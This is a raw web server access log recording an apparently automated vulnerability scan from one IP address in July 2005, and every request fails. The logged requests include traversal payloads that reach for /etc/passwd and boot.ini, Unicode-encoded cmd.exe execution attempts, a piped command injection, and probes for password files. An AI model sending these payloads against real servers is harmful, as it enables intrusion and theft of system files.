"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /logicworks.ini HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /WebAdmin.dll? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /cgi-bin/webbbs.exe HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /webcalendar/week.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /webcalendar/login.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /defines.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /modules/WebChat/users.php? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /modules/WebChat/users.php HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:09 +0100] "GET /modules/WebChat/users.php? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /cgi-bin/wguest.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /error.asp? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20 HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /squirrelmail/src/read_body.php HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /shoutbox.php?conf=../../../../../../../etc/passwd HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /cgi-bin/webgais HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /admin/inc_users.asp%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /filemanager/index.php3? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /forum/newthread.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /get_od_toc.pl? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:10 +0100] "GET /viewreport.pl? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /owls/readings/index.php??filename=/etc/passwd HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /cgi-bin/webwho.pl HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /chat/!pwds.txt HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /sendphoto.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /logbook.pl?file=../../../../../../../bin/cat%20logbook.pl%00| HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /approval/ts_app.htm? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /utils/sprc.asp%20 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /mail/admin/../include.html HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /x_stat_admin.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /x_stat_admin.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /x_stat_admin.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /cgi/vq/demos/respond.pl? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /community/member.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /community/index.php?analized=anything HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /community/forumdisplay.php? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /forum/member.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /debug/dbg? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /XMBforum/buddy.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /xmb18sp2/editprofile.php? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /community/member.php HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /faqman/index.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /admin/script.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /texis/websearch/phine HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /admin/cfg/configsite.inc.php%20 HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /modules/mylinks/myheader.php? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /modules/newbb/viewtopic.php? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /manage/login.asp%20 HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /admin/datasource.asp%20 HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:11 +0100] "GET /servlet/webacc? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /webcalendar/colors.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /webcalendar/view_m.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /photoalbum/admin/adminlogin.asp HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /cgi-bin/YaBB/YaBB.cgi? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /modules/WebChat/quit.php HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /forums/index.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /cgi-bin/rguest.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /yabbse/Sources/Packages.php? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /yabbse//index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /webmail/src/read_body.php HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /yabbse/Reminder.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /yabbse/SSI.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /admin/inc_cats.asp%20 HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /foro/YaBB.pl? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /zentrack/index.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /_head.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /members/ID.pm HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:12 +0100] "GET /cgi-bin/websendmail HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /owls/multiplechoice/index.php? HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /scripts/tradecli.dll?template=aux%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /chat/!nicks.txt HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /scripts/tradecli.dll? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /cp/rac/nsManager.cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /cgi-bin/apexec.pl HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /debug/echo? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /XMBforum/member.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /xmb18sp2/u2uadmin.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /programs/texis.exe/phine HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:13 +0100] "GET /admin/cfg/configscreen.inc.php%20 HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET Savant/3.1 HTTP/1.0" 400 265 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /modules/WebChat/in.php%20 HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /cgi-bin/bb-ack.sh HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /..%c0%af../..%c0%af../sensepost.exe?/c+dir HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /../../../../../../../../../../../etc/passwd HTTP/1.0" 400 299 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /admin/inc_type.asp HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /owls/glossaries/index.php??filename=/etc/services HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:14 +0100] "GET /scripts/tradecli.dll?template=prn%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /xmb18sp2/member.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-bin/texis/phine HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /admin/cfg/configsql.inc.php%20 HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /_vti_pvt/users.pwd HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /iisadmpwd/ HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /modules/WebChat/out.php HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-bin/bb-replog.sh HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /..%c0%af../..%c0%af../cmd1.exe?/c+dir HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /C:/temp/\\../ HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /admin/inc_events.asp%20 HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /msadc/Samples/SELECTOR/showcode.asp HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /scripts/tradecli.dll?template=con%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /xmb18sp2/forumdisplay.php? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-shl/win-c-sample.exe HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-bin/dcforum/dcboard.cgi HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /screen.php? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-bin/bb-rep.sh HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /..%c0%af../..%c0%af../cmd.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:15 +0100] "GET /cgi-bin-sdb/ HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /..\\..\\..\\..\\..\\autoexec.bat HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /admin/inc_edit.asp?iEve=1 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /servers/link.cgi HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /scripts/tradecli.dll?template=com3%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /options.inc.php%20 HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /_vti_pvt/authors.pwd HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /cgi-bin/bb-hostsvc.sh HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /iisadmpwd/sensepost.exe?/c+dir HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /..\\..\\..\\boot.ini HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:16 +0100] "GET /scripts/tradecli.dll?template=com2%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /functions.inc.php%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /cgi-bin/bb-histlog.sh HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /iisadmpwd/cmd1.exe?/c+dir HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /../../../boot.ini HTTP/1.0" 400 273 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /scripts/tradecli.dll?template=com1%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /config.php%20 HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /cgi-bin/bb-hist.sh HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:17 +0100] "GET /iisadmpwd/cmd.exe?/c+dir HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:18 +0100] "GET /aff_news.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:18 +0100] "GET /samples/sensepost.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:19 +0100] "GET /samples/cmd1.exe?/c+dir HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:20 +0100] "GET /samples/cmd.exe?/c+dir HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:21 +0100] "GET /cgi-bin/sensepost.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:22 +0100] "GET /cgi-bin/cmd1.exe?/c+dir HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:22 +0100] "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:23 +0100] "GET /vti_cnf/sensepost.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:23 +0100] "GET /vti_cnf/cmd1.exe?/c+dir HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:24 +0100] "GET /vti_cnf/cmd.exe?/c+dir HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:25 +0100] "GET /vti_bin/sensepost.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:25 +0100] "GET /vti_bin/cmd1.exe?/c+dir HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:26 +0100] "GET /vti_bin/cmd.exe?/c+dir HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:27 +0100] "GET /msadc/sensepost.exe?/c+dir HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:27 +0100] "GET /msadc/cmd1.exe?/c+dir HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:28 +0100] "GET /msadc/cmd.exe?/c+dir HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:29 +0100] "GET /scripts/sensepost.exe?/c+dir HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:29 +0100] "GET /scripts/cmd1.exe?/c+dir HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:30 +0100] "GET /scripts/cmd.exe?/c+dir HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:31 +0100] "GET /sensepost.exe?/c+dir HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:31 +0100] "GET /cmd1.exe?/c+dir HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:32 +0100] "GET /cmd.exe?/c+dir HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:28:08 +0100] "-" 408 - "-" "-"